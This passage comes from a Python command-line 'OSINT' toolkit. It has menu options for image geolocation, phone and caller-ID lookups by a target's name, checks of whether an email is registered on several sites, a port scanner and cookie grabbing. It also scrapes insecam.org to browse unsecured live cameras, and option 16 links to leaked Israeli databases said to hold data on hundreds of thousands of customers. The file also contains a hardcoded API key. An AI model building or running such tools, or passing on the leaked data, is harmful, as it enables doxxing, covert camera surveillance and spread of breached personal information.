AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1' } 1124 | response = requests.get(f'https://api.opencagedata.com/geocode/v1/json?q={self.lat}+{self.lon}&key=03c48dae07364cabb7f121d8c1519492&no_annotations=1&language=en', headers=headers) 1125 | if "country" not in response.text: pass 1126 | try: 1127 | console = Console() 1128 | table = Table(title=f"{White}") 1129 | table.add_column("Pic", no_wrap=True) 1130 | table.add_column("Info") 1131 | 1132 | for info in response.json()['results']: 1133 | date_taken = self.handle_exif_data() 1134 | if date_taken is not None: 
table.add_row("Imagine time", date_taken) 1135 | pixels = self.img_read.size 1136 | dim = self.img_read.shape 1137 | table.add_row("Pixels", str(pixels)) 1138 | table.add_row("Dimensions", str(dim)) 1139 | components = info['components'] 1140 | for key, value in components.items(): 1141 | if key not in ['ISO_3166-1_alpha-2', 'ISO_3166-1_alpha-3', 'ISO_3166-2']: 1142 | table.add_row(key, str(value)) 1143 | table.add_row("GoogleMap link", f"http://www.google.com/maps/place/{self.lat},{self.lon}") 1144 | console.print(table) 1145 | except: pass 1146 | img = images() 1147 | img.LocationInfo() 1148 | elif selection == "8" or selection == "08" or selection == "PhoneNumbers OSINT" or selection == "PHONENUMBERS OSINT" or selection == "phonenumber osint": 1149 | submenu2() 1150 | user_input = input(f"Choose : {Blue}") 1151 | 1152 | if user_input == "1" or user_input == "01" or user_input == "PhoneNumber OSINT" or user_input == "PHONENUMBER OSINT" or user_input == "phonenumber osint": 1153 | PhoneNumber = input(f"{White}[{Blue}+{White}] Enter the phonenumber (ex: +966500000000) : {Blue}") 1154 | 1155 | print(f"{White}Getting info...") 1156 | time.sleep(3) 1157 | print(f"{White}[ Get info for {Blue}{PhoneNumber} {Green}✓{White} ]\n") 1158 | time.sleep(1) 1159 | 1160 | try: parse = phonenumbers.parse(PhoneNumber) 1161 | except: print(f"{Red}Please add countrycode!{White}") 1162 | 1163 | region = geocoder.description_for_number(parse, 'en') 1164 | tiimezone = timezone.time_zones_for_number(parse) 1165 | isp = carrier.name_for_number(parse, 'en') 1166 | 1167 | table = Table(title="") 1168 | table.add_column("Info", no_wrap=True) 1169 | table.add_column("PhoneNumber") 1170 | table.add_row("Location", str(region)) 1171 | table.add_row("TimeZone", str(tiimezone)) 1172 | table.add_row("ISP", str(isp)) 1173 | Console().print(table, justify="left") 1174 | elif user_input == "2" or user_input == "02" or user_input == "Search for the owner of the number by name" or user_input == "SEARCH FOR THE OWNER OF THE NUM BY NAME" or user_input == "search for the owner of the num by name": 1175 | i = 1 1176 | for country in pycountry.countries: 1177 | print(f"{White}[{Blue}{str(i).zfill(3)}{White}] - {country.name} [{country.alpha_2}]") 1178 | i += 1 1179 | 1180 | country = input(f"{White}[{Blue}+{White}] Enter the countrycode (ex: SA) : {Blue}") 1181 | 1182 | country_list = [ 1183 | "AF", "AX", "AL", "DZ", "AS", "AD", "AO", "AI", "AQ", "AG", 1184 | "AR", "AM", "AW", "AU", "AT", "AZ", "BS", "BH", "BD", "BB", 1185 | "BY", "BE", "BZ", "BJ", "BM", "BT", "BO", "BQ", "BA", "BW", 1186 | "BV", "BR", "IO", "BN", "BG", "BF", "BI", "CV", "KH", "CM", 1187 | "CA", "KY", "CF", "TD", "CL", "CN", "CX", "CC", "CO", "KM", 1188 | "CD", "CG", "CK", "CR", "CI", "HR", "CU", "CW", "CY", "CZ", 1189 | "DK", "DJ", "DM", "DO", "EC", "EG", "SV", "GQ", "ER", "EE", 1190 | "SZ", "ET", "FK", "FO", "FJ", "FI", "FR", "GF", "PF", "TF", 1191 | "GA", "GM", "GE", "DE", "GH", "GI", "GR", "GL", "GD", "GP", 1192 | "GU", "GT", "GG", "GN", "GW", "GY", "HT", "HM", "VA", "HN", 1193 | "HK", "HU", "IS", "IN", "ID", "IR", "IQ", "IE", "IM", "IL", 1194 | "IT", "JM", "JP", "JE", "JO", "KZ", "KE", "KI", "KP", "KR", 1195 | "KW", "KG", "LA", "LV", "LB", "LS", "LR", "LY", "LI", "LT", 1196 | "LU", "MO", "MG", "MW", "MY", "MV", "ML", "MT", "MH", "MQ", 1197 | "MR", "MU", "YT", "MX", "FM", "MD", "MC", "MN", "ME", "MS", 1198 | "MA", "MZ", "MM", "NA", "NR", "NP", "NL", "NC", "NZ", "NI", 1199 | "NE", "NG", "NU", "NF", "MK", "MP", "NO", "OM", "PK", "PW", 1200 | "PS", "PA", "PG", 
"PY", "PE", "PH", "PN", "PL", "PT", "PR", 1201 | "QA", "RE", "RO", "RU", "RW", "BL", "SH", "KN", "LC", "MF", 1202 | "PM", "VC", "WS", "SM", "ST", "SA", "SN", "RS", "SC", "SL", 1203 | "SG", "SK", "SX", "SI", "SB", "SO", "ZA", "GS", "SS", "ES", 1204 | "LK", "SD", "SR", "SJ", "SE", "CH", "SY", "TW", "TJ", "TZ", 1205 | "TH", "TL", "TG", "TK", "TO", "TT", "TN", "TR", "TM", "TC", 1206 | "TV", "UG", "UA", "AE", "GB", "US", "UM", "UY", "UZ", "VU", 1207 | "VE", "VN", "VG", "VI", "WF", "EH", "YE", "ZM", "ZW"] 1208 | 1209 | if country in country_list: 1210 | name = input(f"{White}[{Blue}+{White}] Enter the target name : {Blue}") 1211 | 1212 | print(f"{White}Searching...") 1213 | time.sleep(3) 1214 | print(f"{White}[ Search for {Blue}{name} {Green}✓{White} ]\n") 1215 | time.sleep(1) 1216 | 1217 | url = f"https://caller-id.saedhamdan.com/index.php/UserManagement/search_number?country_code={country}&name={name}" 1218 | r = requests.get(url, verify=False) 1219 | data = r.json() 1220 | 1221 | if "result" in r.text: 1222 | if len(data['result']) > 0: 1223 | print(f"-"*40) 1224 | i = 1 1225 | for numbers in data['result']: 1226 | number = numbers['number'] 1227 | name = numbers['name'] 1228 | country_code = numbers['country_code'] 1229 | address = numbers['address'] 1230 | 1231 | print(f"""{Blue}{i} {White}{{ 1232 | {White}[{Blue}-{White}] Name : {Blue}{name} 1233 | {White}[{Blue}-{White}] Number : {Blue}{number} 1234 | {White}[{Blue}-{White}] CountryCode : {Blue}{country_code} 1235 | {White}[{Blue}-{White}] Address : {Blue}{address} {White} }}""") 1236 | i += 1 1237 | elif "No recourd found" in r.text: print(f"{Red}nothing found for this name!") 1238 | else: print(f"{Red}your country not in the list!") 1239 | elif user_input == "99" or user_input == "Back" or user_input == "BACK" or user_input == "back": main_menu() 1240 | else: print(f"{Red}Please choose a correct option!") 1241 | elif selection == "9" or selection == "09" or selection == "Emails OSINT" or selection == "EMAILS OSINT" or selection == "emails osint": 1242 | email = input(f"{White}[{Blue}+{White}] Enter the email target : {Blue}") 1243 | 1244 | print(f"{White}Checking...") 1245 | time.sleep(3) 1246 | print(f"{White}[ Check for {Blue}{email} {Green}✓{White} ]\n") 1247 | time.sleep(1) 1248 | 1249 | checker = Valid.Facebook(email) 1250 | if checker == True: print(f"{White}[{Green}✓{White}] FaceBook Found") 1251 | else: print(f"{White}[{Red}X{White}] FaceBook Not Found") 1252 | time.sleep(0.5) 1253 | url = 
"https://www.tiktok.com/passport/web/user/check_email_registered?shark_extra=%7B%22aid%22%3A1459%2C%22app_name%22%3A%22Tik_Tok_Login%22%2C%22app_language%22%3A%22en%22%2C%22device_platform%22%3A%22web_mobile%22%2C%22region%22%3A%22SA%22%2C%22os%22%3A%22ios%22%2C%22referer%22%3A%22https%3A%2F%2Fwww.tiktok.com%2Fprofile%22%2C%22root_referer%22%3A%22https%3A%2F%2Fwww.google.com%22%2C%22cookie_enabled%22%3Atrue%2C%22screen_width%22%3A390%2C%22screen_height%22%3A844%2C%22browser_language%22%3A%22en-us%22%2C%22browser_platform%22%3A%22iPhone%22%2C%22browser_name%22%3A%22Mozilla%22%2C%22browser_version%22%3A%225.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2014_4%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Version%2F14.0.3%20Mobile%2F15E148%20Safari%2F604.1%22%2C%22browser_online%22%3Atrue%2C%22timezone_name%22%3A%22Asia%2FRiyadh%22%2C%22is_page_visible%22%3Atrue%2C%22focus_state%22%3Atrue%2C%22is_fullscreen%22%3Afalse%2C%22history_len%22%3A17%2C%22battery_info%22%3A%7B%7D%7D&msToken=vPgBDLGXZNEf56bl_V4J6muu5nAYCQi5dA6zj49IuWrw2DwDUZELsX2wz2_2ZYtzkbUF9UyblyjQTsIDI5cclvJQ6sZA-lHqzKS1gLIJD9M6LDBgII0nxKqCfwwVstZxhpppXA==&X-Bogus=DFSzsIVLC8A-dJf6SXgssmuyRsO1&_signature=_02B4Z6wo00001dTdX3QAAIDBDn9.7WbolA3U3FvAABfU8c" 1254 | data = (f"email={email}&aid=1459&language=en&account_sdk_source=web®ion=SA") 1255 | header = {"User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"} 1256 | r = requests.post(url, headers=header, data=data) 1257 | if '{"is_registered":1}' in r.text: print(f"{White}[{Green}✓{White}] TikTok Found") 1258 | else: print(f"{White}[{Red}X{White}] TikTok Not Found") 1259 | time.sleep(0.5) 1260 | url = f"https://api.tellonym.me/accounts/check?email={email}&limit=13" 1261 | headers = {"User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"} 1262 | r = requests.get(url, headers=headers) 1263 | if '"EMAIL_ALREADY_IN_USE"' in r.text: print(f"{White}[{Green}✓{White}] Tellonym Found") 1264 | else: print(f"{White}[{Red}X{White}] Tellonym Not Found") 1265 | elif selection == "10" or selection == "Search Engine" or selection == "SEARCH ENGINE" or selection == "Search engine": 1266 | searchh = input(f"{White}[{Blue}+{White}] Enter the thing to search for : {Blue}") 1267 | result = input(f"{White}[{Blue}+{White}] Enter the num of results : {Blue}") 1268 | 1269 | print(f"{White}Searching...") 1270 | time.sleep(3) 1271 | print(f"{White}[ Search for {Blue}{searchh} {Green}✓{White} ]\n") 1272 | time.sleep(1) 1273 | 1274 | with open("ESR.txt", "at", encoding="utf-8") as f: 1275 | for url in search(searchh, tld="co.in", num=int(result), stop=int(result)): 1276 | page = requests.get(url) 1277 | soup = BeautifulSoup(page.content, 'html.parser') 1278 | 1279 | title = soup.title.string if soup.title else 'No title' 1280 | text = ' '.join(p.get_text() for p in soup.find_all('p')) 1281 | 1282 | f.write(f"""[-] Title : {title} 1283 | [-] URL : {url} 1284 | [-] Text : {text}\n\n""") 1285 | 1286 | print(f"{White}[{Green}✓{White}] The results has been saved in {Blue}{ os.getcwd()}\ESR.txt{White}") 1287 | elif selection == "11" or selection == "Ports Scan" or selection == "PORTS SCAN" or selection == "ports scan": 1288 | def check_port(ip_input, port): 1289 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 1290 | s.settimeout(1) 1291 | if s.connect_ex((ip_input, port)) == 0: return 
port 1292 | 1293 | def scan_ports(ip_input, num_ports): 1294 | open_ports = [] 1295 | 1296 | print(f"{White}Scanning...") 1297 | 1298 | with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor: 1299 | future_to_port = {executor.submit(check_port, ip_input, port): port for port in range(1, num_ports+1)} 1300 | for future in concurrent.futures.as_completed(future_to_port): 1301 | result = future.result() 1302 | if result is not None: open_ports.append(result) 1303 | return sorted(open_ports) 1304 | 1305 | ip_input = input(f"{White}[{Blue}+{White}] Enter the target IP : {Blue}") 1306 | num_ports = int(input(f"{White}[{Blue}+{White}] Entet the num of ports (1~65535) : {Blue}")) 1307 | open_ports = scan_ports(ip_input, num_ports) 1308 | 1309 | if open_ports: 1310 | print(f"{White}[ Scan for {Blue}{ip_input} {White}Ports {Green}✓{White} ]\n") 1311 | time.sleep(1) 1312 | 1313 | for port in open_ports: 1314 | print(f"{White}[{Green}✓{White}] Port {Yellow}{port} {White}is open\n") 1315 | time.sleep(1) 1316 | else: print(f"{Yellow}There are no open ports!{White}") 1317 | 1318 | print(f"{White}[{Green}✓{White}] {Yellow}{num_ports} {White}Ports were scanned") 1319 | 1320 | print(f"{White}[{Green}✓{White}] Open ports : {Yellow}{open_ports}{White}") 1321 | elif selection == "12" or selection == "Deep & Dark Web" or selection == "DEEP & DARK WEB" or selection == "deep & dark web": 1322 | table = Table(title=f"The most famous search engines in the {Red}Deep & Dark Web\n{White}") 1323 | table.add_column("General Info", no_wrap=True) 1324 | table.add_column("Clients") 1325 | table.add_column("Discovery") 1326 | table.add_column("TOR Search") 1327 | table.add_column("TOR Directories") 1328 | table.add_row("Reddit Deep Web", "TOR Download", "OnionScan", "Onion Cab", "Hidden Wiki") 1329 | table.add_row("Reddit Onions", "Freenet Project", "TorBot", "OnionLink", "Core.onion") 1330 | table.add_row("Reddit Darknet", "I2P Anonymous Network", "Tor Scan", "Candle", "Tor2web") 1331 | table.add_row("-", "-", "Onioff", "Not Evil", "Web O Proxy") 1332 | table.add_row("-", "-", "Hunchly Hidden Services Report", "Tor66", "IACA Dark Web Investigation Support") 1333 | table.add_row("-", "-", "docker-onion-nmap", "dark.fail", "-") 1334 | table.add_row("-", "-", "Onion Investigator", "Ahmia", "-") 1335 | Console().print(table, justify="left") 1336 | elif selection == "13" or selection == "Monitor Cameras" or selection == "MONITPR CAMERAS" or selection == "monitor cameras": 1337 | submenu4() 1338 | 1339 | user_input = input(f"Choose : {Blue}") 1340 | 1341 | if user_input == "1" or user_input == "Cameras around the world" or user_input == "CAMERAS AROUND THE WORLD" or user_input == "cameras around the world": 1342 | def monitor_cameras_world(): 1343 | json = requests.get('http://www.insecam.org/en/jsoncountries/', headers={ 1344 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1345 | 'Accept-Encoding': 'gzip, deflate', 1346 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1347 | 'Cache-Control': 'max-age=0', 1348 | 'Connection': 'keep-alive', 1349 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1350 | 'Host': 'www.insecam.org', 1351 | 'Upgrade-Insecure-Requests': 
'1', 1352 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).json()['countries'] 1353 | 1354 | value = [] 1355 | counter = 1 1356 | for i in json: 1357 | print(f"{White}[{Blue}{counter}{White}] {json[i]['country']} [{i}] {Yellow}{ {json[i]['count']} }{White}") 1358 | value.append(i) 1359 | counter += 1 1360 | 1361 | cc_choose = input(f"{White}Enter the countrycode : {Blue}") 1362 | if cc_choose in value: 1363 | r = requests.get('http://www.insecam.org/en/bycountry/'+cc_choose+'/', headers={ 1364 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1365 | 'Accept-Encoding': 'gzip, deflate', 1366 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1367 | 'Cache-Control': 'max-age=0', 1368 | 'Connection': 'keep-alive', 1369 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1370 | 'Host': 'www.insecam.org', 1371 | 'Upgrade-Insecure-Requests': '1', 1372 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1373 | s = r.split('pagenavigator("?page=",')[1] 1374 | next = s.split(',')[0] 1375 | next = int(next) 1376 | 1377 | S = r.split('"thumbnail-item__wrap" href="') 1378 | counter = 1 1379 | for i in S: 1380 | Y = i.split('" ')[0] 1381 | if 'html' in Y: pass 1382 | else: 1383 | url = f'http://www.insecam.org{Y}' 1384 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1385 | counter += 1 1386 | 1387 | info = requests.get(url, headers={ 1388 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1389 | 'Accept-Encoding': 'gzip, deflate', 1390 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1391 | 'Cache-Control': 'max-age=0', 1392 | 'Connection': 'keep-alive', 1393 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1394 | 'Host': 'www.insecam.org', 1395 | 'Upgrade-Insecure-Requests': '1', 1396 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1397 | 1398 | for i in range(2, next): 1399 | print(i) 1400 | url = 'http://www.insecam.org/en/bycountry/RS/?page='+str(i) 1401 | r = requests.get(url, headers={ 1402 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1403 | 'Accept-Encoding': 'gzip, deflate', 1404 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1405 | 'Cache-Control': 'max-age=0', 1406 | 'Connection': 'keep-alive', 1407 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1408 | 'Host': 'www.insecam.org', 1409 | 
'Upgrade-Insecure-Requests': '1', 1410 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1411 | 1412 | S = r.split('"thumbnail-item__wrap" href="') 1413 | counter = 1 1414 | for i in S: 1415 | Y = i.split('" ')[0] 1416 | if 'html' in Y: pass 1417 | else: 1418 | url = f'http://www.insecam.org{Y}' 1419 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1420 | counter += 1 1421 | else: 1422 | print(f"{Red}CountryCode not found!{White}") 1423 | print(f"\n") 1424 | time.sleep(3) 1425 | monitor_cameras_world() 1426 | monitor_cameras_world() 1427 | elif user_input == "2" or user_input == "Cameras of places" or user_input == "CAMERAS OF PLACES" or user_input == "cameras of places": 1428 | def monitor_cameras_places(): 1429 | json = requests.get('http://www.insecam.org/en/jsontags/', headers={ 1430 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1431 | 'Accept-Encoding': 'gzip, deflate', 1432 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1433 | 'Cache-Control': 'max-age=0', 1434 | 'Connection': 'keep-alive', 1435 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1436 | 'Host': 'www.insecam.org', 1437 | 'Upgrade-Insecure-Requests': '1', 1438 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).json()['tags'] 1439 | 1440 | counter = 1 1441 | jsontags = [] 1442 | for i in json: 1443 | jsontags.append(i) 1444 | print(f"{White}[{Blue}{str(counter)}{White}] {i}") 1445 | counter += 1 1446 | place_choose = int(input((f"{White}[{Blue}+{White}] Choose the place : {Blue}"))) 1447 | 1448 | try: 1449 | r = requests.get('http://www.insecam.org/en/bytag/'+jsontags[place_choose]+'/', headers={ 1450 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1451 | 'Accept-Encoding': 'gzip, deflate', 1452 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1453 | 'Cache-Control': 'max-age=0', 1454 | 'Connection': 'keep-alive', 1455 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1456 | 'Host': 'www.insecam.org', 1457 | 'Upgrade-Insecure-Requests': '1', 1458 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36'}).text 1459 | except IndexError: 1460 | print(f"{Red}Place not found!{White}") 1461 | print(f"\n") 1462 | time.sleep(3) 1463 | monitor_cameras_places() 1464 | 1465 | s = r.split('pagenavigator("?page=",')[1] 1466 | next = s.split(',')[0] 1467 | next = int(next) 1468 | S = r.split('"thumbnail-item__wrap" href="') 1469 | counter = 1 1470 | for i in S: 1471 | Y = i.split('" ')[0] 1472 | if 'html' in Y: pass 1473 | else: 1474 | url = f'http://www.insecam.org{Y}' 1475 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1476 | counter += 1 1477 | 1478 | info = requests.get(url, 
headers={ 1479 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1480 | 'Accept-Encoding': 'gzip, deflate', 1481 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1482 | 'Cache-Control': 'max-age=0', 1483 | 'Connection': 'keep-alive', 1484 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1485 | 'Host': 'www.insecam.org', 1486 | 'Upgrade-Insecure-Requests': '1', 1487 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1488 | 1489 | for i in range(2, next): 1490 | url = f'http://www.insecam.org/en/bycountry/RS/?page={str(i)}' 1491 | r = requests.get(url, headers={ 1492 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1493 | 'Accept-Encoding': 'gzip, deflate', 1494 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1495 | 'Cache-Control': 'max-age=0', 1496 | 'Connection': 'keep-alive', 1497 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1498 | 'Host': 'www.insecam.org', 1499 | 'Upgrade-Insecure-Requests': '1', 1500 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1501 | 1502 | S = r.split('"thumbnail-item__wrap" href="') 1503 | counter = 1 1504 | for i in S: 1505 | Y = i.split('" ')[0] 1506 | if 'html' in Y: pass 1507 | else: 1508 | url = f'http://www.insecam.org{Y}' 1509 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1510 | counter += 1 1511 | monitor_cameras_places() 1512 | elif user_input == "99" or user_input == "Back" or user_input == "BACK" or user_input == "back": main_menu() 1513 | else: print(f"{Red}Please choose a correct option!") 1514 | elif selection == "14" or selection == "WebScraping" or selection == "WEbSCRAPING" or selection == "webscraping": 1515 | def extract_links_and_images(url): 1516 | response = requests.get(url) 1517 | soup = BeautifulSoup(response.text, 'html.parser') 1518 | links = [a.get('href') for a in soup.find_all('a', href=True)] 1519 | image_links = [img.get('src') for img in soup.find_all('img', src=True)] 1520 | return links, image_links 1521 | 1522 | url = input(f"{White}[{Blue}+{White}] - Enter the target URL : {Blue}") 1523 | 1524 | print(f"{White}WebScraping...") 1525 | time.sleep(3) 1526 | print(f"{White}[ WebScraping for {Blue}{url} {Green}✓{White} ]\n") 1527 | 1528 | links, image_links = extract_links_and_images(url) 1529 | 1530 | print(f"{White}Paths & Links :") 1531 | for link in links: 1532 | print(f" {link}") 1533 | 1534 | print(f"\n{White}Images :") 1535 | for link in image_links: 1536 | print(f" {link}") 1537 | 1538 | def download_images(image_links, save_dir): 1539 | save_images = input(f"\n{White}Do u want to save the images? 
({Blue}Y{White}/{Blue}N{White}) {Blue}") 1540 | if save_images == "Y" or save_images == "y" or save_images == "Yes" or save_images == "yes" or save_images == "YES": 1541 | if not os.path.exists(save_dir): os.makedirs(save_dir) 1542 | 1543 | for i, link in enumerate(image_links): 1544 | if 'http' not in link: 1545 | link = url + link 1546 | response = requests.get(link) 1547 | with open(os.path.join(save_dir, f"img{i}.png"), 'wb') as f: 1548 | f.write(response.content) 1549 | 1550 | elif save_images == "N" or save_images == "n" or save_images == "No" or save_images == "no" or save_images == "No": another_operation() 1551 | else: 1552 | print(f"{Red}Please choose a correct option!{White}") 1553 | download_images(image_links, save_dir) 1554 | download_images(image_links, "Downloaded images") 1555 | elif selection == "15" or selection == "Get Http Cookies" or selection == "GET HTTP COOKIES" or selection == "get http Cookies": 1556 | target = input(f"{White}[{Blue}+{White}] Enter the target url : {Blue}") 1557 | 1558 | print(f"{White}Getting...") 1559 | time.sleep(3) 1560 | print(f"{White}[ Getting for {Blue}{target} {Green}✓{White} ]") 1561 | time.sleep(1) 1562 | 1563 | res = requests.get(target, cookies=CookieJar()) 1564 | cookies = res.cookies 1565 | 1566 | if cookies: 1567 | with open("Cookies.txt", "w") as f: 1568 | for cookie in cookies: 1569 | f.write(f"{cookie.name} = {cookie.value}") 1570 | print(f"\n[{Green}✓{White}] Cookies saved in {os.getcwd()}\Cookies") 1571 | else: print(f"\n{Yellow}There is nothing to save!") 1572 | elif selection == "16" or selection == "Israeli Databases" or selection == "ISRAELI DATABASES" or selection == "israeli databases": 1573 | table = Table(title=f"{White}Leaked Israeli db uploaded to the MediaFire platform.\n") 1574 | table.add_column("Link") 1575 | table.add_column("Description") 1576 | table.add_column("Size") 1577 | table.add_row("https://www.mediafire.com/file/l4o3yg0nehr0txv/1.csv/file", "Store room db containing 400K+ customers.", "86.6MB") 1578 | table.add_row("https://www.mediafire.com/file/2is34z1ekkhj2su/2.csv/file", "A commercial db containing 200k+ customers.", "23.2MB") 1579 | table.add_row("https://www.mediafire.com/file/63ib6s7o4rla335/3.csv/file", "A normal db contains 38K+ person.", "6.69MB") 1580 | table.add_row("https://www.mediafire.com/file/0ruazdhfg3pib51/Leaks.json/file", "Json file containing info of 521 Israeli companies.", "689KB") 1581 | Console().print(table, justify="left") 1582 | elif selection == "17" or selection == "Check Passwords Leakage" or selection == "CHECK PASSWORDS LEAKAGE" or selection == "check passwords leakage": 1583 | def check_password_leak(password): 1584 | sha1password = hashlib.sha1(password.encode('utf-8')).hexdigest().upper() 1585 | first5_char, tail = sha1password[:5], sha1password[5:] 1586 | url = f'https://api.pwnedpasswords.com/range/{first5_char}' 1587 | response = requests.get(url) 1588 | hashes = (line.split(':') for line in response.text.splitlines()) 1589 | for h, count in hashes: 1590 | if h == tail: return f"{White}[{Red}-{White}] {Red}The passwas leaked {count} times!" 1591 | return f"{White}[{Green}-{White}] {Green}The pass isn’t leaked." 
